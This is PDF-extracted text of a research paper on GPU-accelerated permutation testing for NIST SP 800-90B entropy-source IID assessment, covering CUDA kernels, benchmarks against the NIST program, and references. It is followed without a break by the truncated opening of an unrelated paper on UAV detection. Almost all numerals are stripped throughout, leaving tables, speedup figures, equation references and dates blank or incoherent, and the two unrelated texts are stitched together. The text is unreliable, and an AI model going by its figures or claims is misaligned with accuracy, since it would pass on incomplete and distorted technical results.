method one cuda thread performs statistical tests sequentially on one shuffled dataset. this method is illustrated in fig. . if this method is applied to the kernel statistical test, b′=(n /t) cuda blocks are used when the number of cuda threads is t . however, because each thread runs tests in sequence, room for improvement is apparent in this method. parallelization method in this method, each block performs its designated statistical test out of tests on one shuffled dataset shared by blocks. thus, for one shuffled set, statistical tests are run in parallel, and this kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method is a parallelization of the serial part in method above. this method is illustrated in fig. , which indicates the kernel statistical test with b′=((n /t)× ) cuda blocks and t threads in a block. proposed optimiza- tion this method optimizes parallelization method through two steps. (step ) to hide the latency in accessing the slow global memory of the gpu, we analyzed the runtime of statistical tests from an algorithmic perspective. we merged several statistical tests with similar access patterns to the global memory into a single test. therefore, merged statistical tests replace statistical tests. (step ) when analyzed the execution time of nine merged tests, the execution time of one longest test was similar to the sum of the execution times of the remaining eight tests. we configured each thread of a block to runs the longest test and each thread of the other block to run eight merged tests so that the workload between sms is balanced. this method is depicted in fig. , where the kernel statistical test uses b′=((n /t)× ) cuda blocks, with t threads in each block. with slight modifications to the kernels shuffling and statistical test, which are designed for non-binary samples, as described above, we can parallelize the permutation testing when the input data are binary. if the noise sample size is bit, one of two conversions is applied to certain statistical tests. the data after conversion i and data after conversion ii can be stored separately in the global memory. since the data after conversion i are the result of calculating the hamming weight of the data following conversion ii, we designed to minimize the use of global memory as follows: in the kernel shuffling, n cuda threads first generate n shuffled data in parallel. thereafter, each thread proceeds to conversion ii for its own shuffled data and stores the results (no. in table ) in the global memory of the gpu. the kernel statistical test runs nine merged tests. the merged tests that required conversion i calculate the hamming weight of the data after conversion ii. as in the optimized method for non-binary data, the thread in the block executes at least one test so that the execution time of each block is similar. therefore, b′=(n /t)× cuda blocks are used when the number of cuda threads is t . overview of hybrid cpu/gpu implementation of permutation testing we implemented the gpu-based permutation testing, which comprised statistical tests without the compression algorithm and is parallel on the gpu. this section presents a hybrid cpu/gpu implementation of permutation testing that includes the compression algorithm. as shown in fig. , we designed the hybrid implementation to perform , shuffling and compression tests using openmp according to the result of our gpu- based permutation testing. the noise source is determined as the non-iid if at least one test does not satisfy eq. ( ), as shown in algorithm . therefore, if our gpu-based kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure general parallel method of kernel statistical test. full-size doi: . /peerjcs. /fig- figure general parallel method of kernel statistical test. full-size doi: . /peerjcs. /fig- kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure proposed optimization method of kernel statistical test. full-size doi: . /peerjcs. /fig- program determined that the input noise source is non-iid, our hybrid program finally determines that the input is non-iid, without compression tests. if our gpu-based program determined that the input is iid, the noise source might be determined to be iid or be determined to be non-iid only by the result of the compression test. therefore, our hybrid program performs at most , shuffling and compression tests in parallel using openmp. if the results of the compression tests satisfy eq. ( ), the noise source is finally determined as the iid; otherwise, it is determined as the non-iid. experiments and performance evaluation in this section, we analyze the performance of the proposed methods and compare its performance with the nist program written in c++. the performance was evaluated using two hardware configurations (table ). there are two noise sources used in experiments. the first noise source is truerand provided by the nist. the second noise source, gettickcount, could be collected through the gettickcount() function in the windows environment. the sample size of each noise source is , , or bits. as a result of confirming whether the input data are iid by the iid test, truerand was determined as the iid noise source; however, gettickcount was determined as the non-iid noise source. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure proposed hybrid cpu/gpu program of permutation testing. (a) process on the host/cpu. (b) process on the device/gpu. full-size doi: . /peerjcs. /fig- the experimental result is the average of the results repeated times. the difference between the results of the experiments repeated times was within %. since the gpu boost technology, which controls the clock speed according to extra power availability, is used in nivida gpu, the results are with the gpu boost applied, unless otherwise noted. gpu optimization concepts we conducted experiments on the optimization concepts considered while gpu-based parallelizing the permutation testing. the experimental data used in this section consisted of one million samples collected from the noise source gettickcount, where the sample size was bits. in the experiments, we set t , the number of threads per block used in the cuda kernel, to , a multiple of the warp size (= ). since t is set to , we set n to , , which is the multiple t , and used about gb (= n× , , bytes) of the global memory of the gpu. coalesced memory access we used the memory coalescing technique (fig. ) to transfer data from slow global memory to the registers efficiently. table displays the performance of our parallel implementation of the permutation testing before and after using this technique. permutation testing used kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table configurations of experimental platforms. name device a device b cpu model intel(r) core (tm) i - k intel(r) core (tm) i - cpu frequency . ghz . ghz cpu cores cpu threads accelerator type nvidia gpu nvidia gpu models titan xp geforce gtx multiprocessors (sms) cuda cores/sm cuda capability major . . global memory , mb , mb gpu max clock rate , mhz , mhz memory clock rate , mhz , mhz registers/block , , threads/sm , , threads/block , , warp size cuda driver version . . figure memory coalescing technique. full-size doi: . /peerjcs. /fig- kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance of proposed gpu-based parallel implementation of permutation testing de- pending on whether memory coalescing technique was used (the number of cuda blocks = , the number of threads per block = ). before using memory coalescing technique (s) after using memory coalescing technique (s) device a . . device b . . the kernel statistical test with our optimization method. as a result, we improved performance by . times. all experiments after this section use the memory coalescing technology. merging statistical tests our optimization method consists of a step in which tests are merged (step ) and a step in which at least one test is allocated in the cuda block so that the working time of each thread is similar (step ). therefore, we confirmed the validity of our merged tests. we first designed new cuda kernels for experimentation, where each of the n threads performed one statistical test on one shuffled data. we measured the execution time of each test kernel. each test kernel used eight cuda blocks since we set the number of threads per block t to . the experimental results showing the execution time of each statistical test on the gpu are shown in table . from table , it takes approximately four seconds if one thread sequentially performs statistical tests. however, if one thread performs nine merged tests, it can be expected that it will take about . seconds. we improved the performance for all statistical tests by about . times by combining the tests. we measured the execution time of the parallelization method applied step , and our method. referring to the results of table , we designed each cuda block of method which step was applied to proceed with each of tests ∼ , test , test , and tests ∼ ; each block can complete its work in a similar time. the kernel statistical test applying this method uses (=(n /t)× ) blocks; however, applying our proposed method uses (= (n /t)× ) blocks. table presents the execution time of a kernel statistical test with each method applied. as a result, our method is about . times faster than the parallelization method applied step . parallelism methods we experimentally verified whether the proposed optimization method is better than other methods. we first confirmed the difference in the operation time of each cuda thread in the kernel statistical test, where each parallelization method is applied by drawing a figure. figure displays the operation times of the cuda threads, assuming that the gpu had three sms and considering the results of table . it is the task of the gpu scheduler to allocate the cuda blocks to the sms; however, these were assigned arbitrarily for visualization in fig. . as indicated in table , the statistical tests had different execution times. therefore, we expressed the different lengths of the threads in kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table left: execution time of each statistical test on gpu; right: execution time of each merged statistical test on gpu (device a, number of cuda blocks = , number of threads per block = ). no. name of statistical test execution time (ms) no. name of merged statistical test execution time (ms) excursion test ′ excursion test number of directional runs ′ directional runs and number of inc/dec length of directional runs numbers of increases and decreases number of runs based on median ′ runs based on median length of runs based on median average collision test statistic , ′ collision test statistic , maximum collision test statistic , periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) table performance of parallelization method applied step and our method (device a, the num- ber of threads per block = ). number of cuda blocks execution time (s) parallelization method ( tests) +step . our method ( merged tests +step ) . the cuda blocks running each statistical test, as illustrated in fig. . in the proposed method, several statistical tests were merged for optimization. the execution time of the merged statistical test (table ) was equal to or slightly longer than each execution time of the original statistical tests prior to merging (table ). suppose that test & is a merged function of test and test . the lengths of the threads in the block running test & were slightly longer than those of the threads in the block running test or test , as indicated in fig. . as illustrated in fig. , we expected that our optimization outperformed parallelization methods and . we measured the execution time of a kernel statistical test according to the parallel method. table shows the execution times of each kernel measured on both devices. if the occupancy of the kernel in our parallelization method is calculated, it reaches %. it is the occupancy per sm. since our method uses a small number of blocks, there may be idle sms on a high-performance gpu with many sms. however, if the host calls the test kernel kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure operation times of cuda threads in kernel statistical test when applying each method on device. full-size doi: . /peerjcs. /fig- table execution time of kernel statistical test according to parallel method (number of threads per block = ). execution time (s) method number of cuda blocks device a device b parallelization method . . parallelization method . . our optimization (step ) . . our optimization (step & ) . . for each noise source simultaneously using a multi-stream technique, we can use almost full gpu capability. since statistical tests were running in parallel, the parallelization method was improved by . times over method in device a; however, there was no improvement in the performance in device b. in device b, the number of sms was , and the number of active blocks was calculated by eight. thus, it is analyzed as the result derived since the number of blocks generated by the kernel (= ) is more than the number of blocks active in the device simultaneously (= ). our method (step ) is about . and . times, respectively, faster than the parallelization method in device a and device b. it is analyzed as the results due to the merged statistical tests that improved the performance, kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure execution time of the gpu-based parallel implementation of permutation testing according to parallel method (number of threads per block = ). full-size doi: . /peerjcs. /fig- as confirmed in the previous section. since the work of each cuda block was adequately balanced, it is analyzed that our method (step & ) was slightly improved over our method (step ). furthermore, our method is times and about . times, respectively, faster than the parallelization method in device a and device b. next, we analyzed how each method affected the performance of gpu-based implementation of permutation testing. as shown in algorithm , the permutation testing has , iterations. since implemented n iterations in parallel, the kernel curandinit is called once, and the kernel shuffling and statistical test are called d , /ne times. since we set n to , and did not use eq. ( ) in this experiment, the permutation testing consists of one curandinit, five shuffling and five statistical test. figure shows the execution time of this permutation testing according to the parallelization method. the permutation testing applied our method shows an improvement of about . times over the permutation testing applied method . thus, our optimization method outperformed parallelization methods and . performance evaluation of gpu-based permutation testing according to the parameter parameter n is the number of iterations of the permutation testing to be processed in parallel. we measured the performance of the gpu-based parallel implementation of the permutation testing according to the value of the parameter n . as shown in fig. , the kernel curandinit is called once. the kernel shuffling and statistical test are called at most d , /ne times. the calling process repeated is as follows: after the kernel shuffling and the kernel statistical test are sequentially run once, if the results do not satisfy eq. ( ), each kernel is called again. if each kernel kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table execution time of the gpu-based parallel permutation testing according to the value of the parameter n . parameter n , , , , , global memory (gb) . . . . . execution time (s) truerand . . . . . device a gettickcount . . . . . truerand . . . − − device b gettickcount . . . − − has been called d , /ne times or the results satisfy eq. ( ), the call to each kernel is aborted. if the noise source is iid, there is little evidence against the null hypothesis that the noise source is iid in the permutation testing. the probability of satisfying eq. ( ) increases, and the number of the calls of the kernel decreases. on the other hand, if the noise source is non-iid, the probability of satisfying eq. ( ) decreases, and the number of the calls increases, contrary to the iid noise source case. therefore, we used truerand and gettickcount, which were determined as the iid and the non-iid, respectively, by permutation testing. the sample size of each noise source is bits. permutation testing performs , iterations, so we set n to be a factor of , and t to . since the size of the global memory in device a is gb, we set n to , , , , , , , , and , . in device b, the size of the global memory is gb, and so we set n to , , , , and , . table presents the execution time of the gpu-based parallel implementation of the permutation testing and the usage of global memory (calculated by referring to table ), according to the value n . when truerand was used as input data, each of the kernel shuffling and statistical test was called once, and then the noise source was determined as the iid through the test results. therefore, in an environment (e.g., hardware rng) where the noise sources are likely to be iid, it is analyzed that it is appropriate even if the user sets n to , . in gettickcount, each kernel was called d , /ne times and then was determined as the non-iid. the execution time multiplied by d , /ne, when truerand was the input, gives a similar result to the execution time when gettickcount was the input. as shown in table , in the case of gettickcount, as n increases, the execution time decreases and then increases again. each thread used the global memory of million bytes. therefore, we analyzed it as a result of the latency derived by increasing access to global memory as the number of switching by the warp unit increases. it is appropriate to select n by considering all of the global memory usages, execution time determined as an iid noise source, and execution time determined as a non-iid noise source in a general environment. as a result of the experiment, it is appropriate to set n to , when using device a and to select n to , when using device b. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performances of our gpu-based program and nist program written in c++ according to noise source (without the compression test). execution time (s) name of noise source truerand gettickcount sample size (bit) nist program (cpu single-thread) . . . . . . device a nist program (cpu multi-thread) . . . . . . proposed program (gpu) . . . . . . nist program (cpu multi-thread) . . . . . . device b proposed program (gpu) . . . . . . performance evaluation of gpu-based permutation testing with nist program according to noise source for each noise source, we measured the performances of our gpu-based program and the nist program. two noise sources, truerand and gettickcount, were used in the experiment and the sample size of each noise source is one of , , and bits. we set n to , and , , respectively, when using device a and device b, reflecting the result of the previous experiment. we set t to . the nist program, written in c++, is compatible with openmp and can make , iterations work in a multi-threaded environment. in this experiment, the nist program running on the cpu used cpu threads in device a and eight cpu threads in device b (table ). thus, we compared our performance with permutation testing in the single-threaded and multi-threaded nist programs. since our gpu-based parallel implementation of the permutation testing was designed without the compression algorithm, we measured the performance of the nist program without the compression test. table presents the execution times of the nist program on the cpu and the proposed program on the gpus, measured for each noise source. for truerand, the performance of the proposed program was approximately . times better than that of the single-threaded nist program. it was about . times better than the performance of the multi-threaded nist program. in the case of gettickcount, the performance of our program was improved by approximately . times and about . times over the single-threaded and the multi-threaded nist programs. in table , the minimum performance improvement of the proposed program for truerand was not higher than that of the program for gettickcount. as shown in algorithm , the number of iterations (up to , ) in permutation testing varies depending on whether eq. ( ) is satisfied. the nist program on the cpu was executed as one statistical test unit. if the accumulated results of the statistical test satisfied eq. ( ), that test was no longer performed in the iterations. on the other hand, our program on the gpu was executed as an n unit of statistical tests, and if the results of all tests satisfied eq. ( ), it was not repeated. namely, the kernel shuffling and statistical test were not called again. if the noise source was likely to be determined as the iid from the permutation testing, there is a high probability that all of the statistical tests satisfy eq. ( ). the nist kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table execution time of the gpu-based parallel implementation of permutation testing with/with- out gpu boost (device a). execution time (s) name of noise source with gpu boost without gpu boost truerand- bit . . truerand- bit . . truerand- bit . . gettickcount- bit . . gettickcount- bit . . program operating as one test unit repeatedly performed each test less than n times and then determined truerand as the iid; however, in the case of gettickcount, both the nist program and our program performed , iterations and determined gettickcount as the non-iid. therefore, it is analyzed that the difference in performance improvement of our program by noise source is reasonable. nvidia gpu boost technology boosts the cuda core frequency from , to , mhz in device a. the execution time of our gpu-based program without gpu boost is presented in table . without gpu boost, the performance decreased by up to . times compared to the case with gpu boost. it is analyzed that the difference in performance with or without gpu boost is not significant. the performance of our gpu-based program without gpu boost is approximately to times better than the single-threaded nist program and about to times better than the multi-threaded nist program. performance evaluation of our hybrid cpu/gpu program we measured the performance of the proposed hybrid cpu/gpu program and the nist program using truerand and gettickcount, whose sample size is bits. both programs included the compression test. figure presents the performance of each program. a base- logarithmic scale is used for the y -axis. since the nist program performs the compression tests, it takes longer than the runtime of the nist program without the compression test written in table . in particular, when determining gettickcount to be non-iid, the compression test runs almost , times, and so the nist program, in this case, takes much longer than the runtime written in table . our hybrid cpu/gpu program performs the compression tests using openmp only when our gpu-based program determined the noise source (e.g., truerand) as the iid. as shown in fig. , it is reasonable that the execution time of our hybrid program for truerand is longer than that of our gpu-based program presented in table . since gettickcount was determined as the non-iid by our gpu-based program, the compression test does not run in our hybrid program. therefore, our hybrid program has the same execution time as our gpu-based program in table . compared to the single-threaded nist program, the proposed hybrid cpu/gpu program had an improved performance of approximately . to . times. compared kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure execution time of our hybrid program and nist program. full-size doi: . /peerjcs. /fig- with the multi-threaded nist program, the performance improved about . to . times. the nist program always performed up to , compression tests using openmp; however, our hybrid program performed the compression tests using openmp only if the noise source was determined as the iid by all statistical tests in our gpu-based program. therefore, our hybrid program is efficient when determining the noise source as the non-iid than when determining the noise source as the iid. when the nist program applies our implementation method, it first performs the shuffling and statistical tests (at most , times). if it determined that the noise source was non-iid by these results, it does not run the shuffling and the compression tests. when the input is non-iid, the nist program (with the compression test) had the same runtime presented in table . otherwise, the nist program has the same runtime as the original program. therefore, our hybrid cpu/gpu program sped the process about times over the multi-threaded nist program applied our method for iid noise sources ( -bit sample size). our program had an improved performance of approximately for the non-iid input. conclusions the security of modern cryptography is heavily reliant on sensitive security parameters such as encryption keys. rngs should provide cryptosystems with ideal random bits, which are independent, unbiased, and, most importantly, unpredictable. to use a secure rng, it is necessary to estimate its input entropy as precisely as possible. the nist offers kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. two programs for entropy estimations, as outlined in sp - b. however, much time is required to manipulate several noise sources for an rng. we proposed gpu-based parallel implementation of the permutation testing, which required the longest execution time in the iid test of sp - b. our gpu-based implementation excluded the compression test that is unsuitable for cuda version implementation. our gpu-based method was designed to use massive parallelism of the gpu by balancing the execution time for statistical tests, as well as optimizing the use of the global memory for data shuffling. we experimentally compared our gpu optimization with the nist program excluded the compression test. our gpu-based program was approximately to times faster than the single-threaded nist program. moreover, our proposal improved the performance by about to times over the multi-threaded nist program. we proposed the hybrid cpu/gpu implementation of the permutation testing. it consists of our gpu-based program and the compression tests that run using openmp. experimental results show that the performance of our hybrid program is approximately to times better than that of the multi-threaded nist program (with compression test). most noise sources are non-iid, and our program has better performance when determining the noise source as the non-iid. it is expected that the time required for analyzing the rng security will be significantly reduced for developers and evaluators by using the proposed approach, thereby improving the validation efficiency in the development of cryptographic modules. it is expected that our optimization techniques might be adapted to the problems of performing several tests or processes on thousands or more of data, each of which is large. additional information and declarations funding this work was supported by an institute for information & communications technology promotion (iitp) grant funded by the korean government (msit) (no. - - , research on the security of random number generators and embedded devices). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: institute for information & communications technology promotion (iitp) grant: no. - - . competing interests the authors declare there are no competing interests. author contributions • yewon kim conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • yongjin yeom conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and source code are available at github: https://github.com/yeah kim/yeah_ gpu_sp _ b_iid. references barker e, kelsey j. . recommendation for the entropy sources used for random bit gen- eration. national institute of standards and technology nist special publication (sp) - b (draft). bernstein dj, chang y-a, cheng c-m, chou l-p, heninger n, lange t, van someren n. . factoring rsa keys from certified smart cards: coppersmith in the wild. in: sako k, sarkar p, eds. advances in cryptology - asiacrypt . asiacrypt . lecture notes in computer science, vol. . berlin, heidelberg: springer, – doi . / - - - - _ . ding y, peng z, zhou y, zhang c. . android low entropy demystified. in: ieee international conference on communications (icc). piscataway: ieee, – . heninger n, durumeric z, wustrow e, halderman ja. . mining your ps and qs: detection of widespread weak keys in network devices. in: presented as part of the st usenix security symposium (usenix security ). – . iso/iec- . . information technology —security techniques —test and analysis methods for random bit generators within iso/iec and iso/iec . kang j-s, park h, yeom y. . on the additional chi-square tests for the iid assump- tion of nist sp - b. in: th annual conference on privacy, security and trust (pst). piscataway: ieee, – . kaplan d, kedmi s, hay r, dayan a. . attacking the linux prng on android: weaknesses in seeding of entropic pools and low boot-time entropy. in: th usenix workshop on offensive technologies (woot ). kelsey j. . entropy sources and you: an overview of sp - b. in: random bit generation workshop. kim sh, han d, lee dh. . predictability of android openssl’s pseudo random number generator. in: proceedings of the acm sigsac conference on computer & communications security. new york: acm, – . li p, zhou s, ren b, tang s, li t, xu c, chen j. . efficient implementation of lightweight block ciphers on volta and pascal architecture. journal of information security and applications : – doi . /j.jisa. . . . li q, zhong c, zhao k, mei x, chu x. . implementation and analysis of aes encryption on gpu. in: ieee th international conference on high performance computing and communication & ieee th international conference on embedded software and systems. piscataway: ieee, – . kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/yeah kim/yeah_gpu_sp _ b_iid https://github.com/yeah kim/yeah_gpu_sp _ b_iid http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . /peerj-cs. ma j, chen x, xu r, shi j. . implementation and evaluation of different parallel designs of aes using cuda. in: ieee th international conference on high performance computing and communication & ieee th international conference on embedded software and systems. piscataway: ieee, – . michaelis k, meyer c, schwenk j. . randomly failed! the state of randomness in current java implementations. in: dawson e, ed. topics in cryptology – ct-rsa . ct-rsa . lecture notes in computer science. vol. . berlin, heidelberg: springer, – doi . / - - - - _ . müller s. . linux random number generator - a new approach. available at https: //chronox.de/lrng/doc/lrng.pdf (accessed on february ). neves s, araujo f. . on the performance of gpu public-key cryptography. in: asap - nd ieee international conference on application-specific systems, architectures and processors. piscataway: ieee, – . nist. . entropyassessment. github. available at https://github.com/usnistgov/ sp - b_entropyassessment (accessed on february ). nist, cse. . implementation guidance for fips pub - and the cryptographic module validation program. available at http://csrc.nist.gov/groups/stm/cmvp/ documents/fips - /fips ig.pdf (accessed on february ). nvidia. a. cuda c++ best practices guide. in: nvidia, aug. available at https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html (accessed on february ). nvidia. b. cuda c++ programming guide. nvidia, aug. available at https:// docs.nvidia.com/cuda/cuda-c-programming-guide/index.html (accessed on february ). openmp. . openmp application programming interface. available at https://www. openmp.org/wp-content/uploads/openmp-api-specification- . .pdf (accessed on february ). pan w, zheng f, zhao y, zhu w-t, jing j. . an efficient elliptic curve cryptography signature server with gpu acceleration. ieee transactions on information forensics and security ( ): – . patel ra, zhang y, mak j, davidson a, owens jd. . parallel lossless data compression on the gpu. piscataway: ieee. ristenpart t, yilek s. . when good randomness goes bad: virtual machine reset vulnerabilities and hedging deployed cryptography. in: proceedings of network and distributed security symposium (ndss). san diego, ca, usa: the internet society, – . schneier b, fredrikson m, kohno t, ristenpart t. . surreptitiously weakening cryptographic systems. in: iacr cryptol. eprint arch. vol. . . available at https://eprint.iacr.org/ / (accessed on february ). seward j. . bzip and libbzip , version . . : a program and library for data compression. available at https://sourceware.org/bzip / . kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ https://chronox.de/lrng/doc/lrng.pdf https://chronox.de/lrng/doc/lrng.pdf https://github.com/usnistgov/sp - b_entropyassessment https://github.com/usnistgov/sp - b_entropyassessment http://csrc.nist.gov/groups/stm/cmvp/documents/fips - /fips ig.pdf http://csrc.nist.gov/groups/stm/cmvp/documents/fips - /fips ig.pdf https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html https://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html https://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html https://www.openmp.org/wp-content/uploads/openmp-api-specification- . .pdf https://www.openmp.org/wp-content/uploads/openmp-api-specification- . .pdf https://eprint.iacr.org/ / https://sourceware.org/bzip / http://dx.doi.org/ . /peerj-cs. shastry k, pandey a, agrawal a, sarveswara r. . compression acceleration using gpgpu. in: ieee rd international conference on high performance computing workshops (hipcw). piscataway: ieee, – . stevens m, bursztein e, karpman p, albertini a, markov y. . the first collision for full sha- . in: annual international cryptology conference. heidelberg: springer, – . sönmez turan m, barker e, kelsey j, mckay k, baish m, boyle m. . recommenda- tion for the entropy sources used for random bit generation. in: national institute of standards and technology. nist special publication (sp) - b ( nd draft). sönmez turan m, barker e, kelsey j, mckay k, baish m, boyle m. . recommen- dation for the entropy sources used for random bit generation. in: national institute of standards and technology. nist special publication (sp) - b. available at https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp. - b.pdf . vaidya b. . hands-on gpu-accelerated computer vision with opencv and cuda: effective techniques for processing complex image data in real time using gpus. birmingham, uk: packt publishing ltd. yoo t, kang j-s, yeom y. . recoverable random numbers in an internet of things operating system. entropy ( ): doi . /e . zhu s, ma y, chen t, lin j, jing j. . analysis and improvement of entropy esti- mators in nist sp - b for non-iid entropy sources. iacr transactions on symmetric cryptology ( ): – doi . /tosc.v .i . - . zhu s, ma y, li x, yang j, lin j, jing j. . on the analysis and improvement of min- entropy estimation on time-varying data. ieee transactions on information forensics and security : – . kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp. - b.pdf http://dx.doi.org/ . /e http://dx.doi.org/ . /tosc.v .i . - http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) fast aerial uav detection based on image segmentation and hog-fld feature fusion li xiaoping school of computer science and engineering xi’an technological university xi’an, , shaanxi e-mail: @qq.com lei songze school of computer science and engineering xi’an technological university xi’an, , shaanxi e-mail: lei_sz@ .com wang yanhong school of science xi’an technological university xi’an, , shaanxi e-mail: @qq.com xiao feng a , tian penghui * b school of computer science and engineering xi’an technological university xi’an, , shaanxi e-mail: a @qq.com b @qq.com abstract—in order to detect non-cooperative target uav quickly and accurately, a novel method of uav detection method based on graph theory and hog-fld feature fusion is presented in this paper. in order to avoid the time-consuming full search, the candidate areas of the uav are obtained through the selective search of the image segmentation and the similarity, and the features are extracted through the method of gradient orientation histogram fusion fld linear to train the svm classifier with generalization ability to identify the uav. the method can detect the uav quickly and accurately under complicated background and circumstances of various position and angle. compared with the sliding window method based on image segmentation and hog+svm, the experimental results show that the speed of this method has been obviously improved with the same recognition accuracy. keywords-image segmentation; graph theory; hog; fld; svm i. introduction in recent years, uav have been widely used in the military field. due to its advantages of small size, low cost, low noise, high maneuverability, high concealment and superior stability, uav can be applied to various of fields in the world for the purpose of reconnoitering enemy troops, detecting danger zone, tracking target, electronic interference, communication relay, and even completing the task of attack by carrying small-scale offensive weapons. therefore, to detect non-cooperative uav is necessary. to completed the task of independently identifying aerial non-cooperative uav and monitoring in real time to border areas of different country could realize economic and extensive border surveillance and play a security role for the country and society. recently, on the uav detection technology of domestic and foreign scholars is rare. however, the difficulty of the uav detection technology is mainly that the uav in the picture is easily affected by the position, the angle, the distance from the camera and its own structure, which makes it difficult to detect the uav. above problem is extremely similar to difficulty of target detection technology and needs to research and practice. at present, the common methods used in target international conference on sensor network and computer engineering (icsnce ) detection are mainly following methods: the method based on the optical flow field [ ], the inter-frame difference method and the background detection based on the target detection method. optical flow target detection is a method of moving target, which the basic principle is: that a velocity vector is given to the moving target pixel, and the image will form an optical flow field, and its background will be obviously distinguished from the moving target vector. in the meanwhile, you can get the location of the target by analyzing dynamic image. this method is suitable for all kinds of backgrounds, and it has no requirement for background. its drawbacks are that the number of pixels is too large, the distribution of optical motion fields is too wide and inaccurate, and the computation is too large. the method of inter-frame difference [ ] is used to obtain the foreground of the target by using the threshold segmentation method to obtain the difference between the pixels of the adjacent two frames, whose calculation is small, and the ability of target recognition is poor when the illumination changes. in order to ensure the accuracy and integrity of uav target detection, the traditional method of sliding window to detect uav requires that the sample picture and the picture to be tested need to be scaled until the target of the image to be detected is less than or equal to the template size and the detection is stopped. so that the uav which is larger than or equal to the template size can also be detected accurately after adjusting the pixel size of the whole image to be tested. however, the hog feature [ - ] is extracted after the image is scaled. extracting hog feature need to traverse the whole image by sliding window [ ] until the edge contour feature of high dimension can be obtained by matching, so that the traversal need to take a long time, which leads to the slow generation of feature descriptors, and the scale of each level requires a large amount of computation. an image segmentation method based on graph theory and hog-fld feature fusion is proposed for uav detection in this paper. this method is divided into training stage and test stage. in the training stage, it is necessary to unify and gray-scale processed the pixel size of positive and negative samples set be collected in advance, and then it could obtain the feature vector with small dimension which can stably describe the uav contour feature after the feature extraction is carried out by using hog-fld feature fusion method. finally, the feature vector is input into the support vector machine model, the support vector machine classifier is trained after a series of statistical learning. in the test stage, the candidate regions are screened out by using the segmentation method based on graph theory and are extracted features according to the feature extraction method of the training stage, and then the extracted features are input into the trained classifier to carry out classification and detecting whether the candidate area includes the target uav. image segmentation uses the connected method of graph [ ] or the minimum spanning tree to merge the region, which mainly determines whether to merge the two regions according to the similarity of each region of the image. this method could not only obtain the global features of the image and the candidate area of uav, but also the calculation speed is very fast and the processing efficiency is also high. the features obtained by combining the hog features of gradient histogram and the fisher linear discriminant analysis (fld) are selected as the features of the statistical learning training classifier in feature extraction stage. because of the advantages that the features of small dimension and good robustness and good classification ability extracted by hog-fld feature fusion are rarely affected by the changes of local illumination, background change, target location and angle change, it is easier to train a classifier that is easy to classify and has strong generalization ability. ii. segmentation method based on graph theory to obtain region of interest a. segmentation method based on graph theory image segmentation is a way to separate the image into regions with different characteristics and separate the interested objects from the background in the segmented blocks. let interest objects and backgrounds in segmented regions show a clear sense of contrast based on human visual effects. image segmentation method plays an important role in further international conference on sensor network and computer engineering (icsnce ) analysis of image such as image compression and image recognition. the image segmentation method based on graph theory (graph-based image segmentation) and the region merging method are selected to segment the image in this paper. the image segmentation method based on graph theory takes the image as the object transforming the image into the right undirected graph, and uses the connected branch method of graph [ ] to segment the image, and then it could obtain the region block. the region merging method is to merge the segmented region blocks according to the specific merging rules. because of great different characteristics of the uav and the background in texture, color, size and degree of agreement, regional block of great different characteristics need to be decomposed and regional block of small different features need to be merged [ ], which follows the principle of [ ] the optimal segmentation. b. acquisition principle of uav region of interest the image contains information such as shape, size, color, texture and so on. image will be segmented after the whole image is traversed by the search algorithm of graph theory. in the graph theory, the definition of the image - to - graph [ ] is described as follows: ),( evg  is an undirected graph with v as its vertex and e as its edge set. any edge evv ji 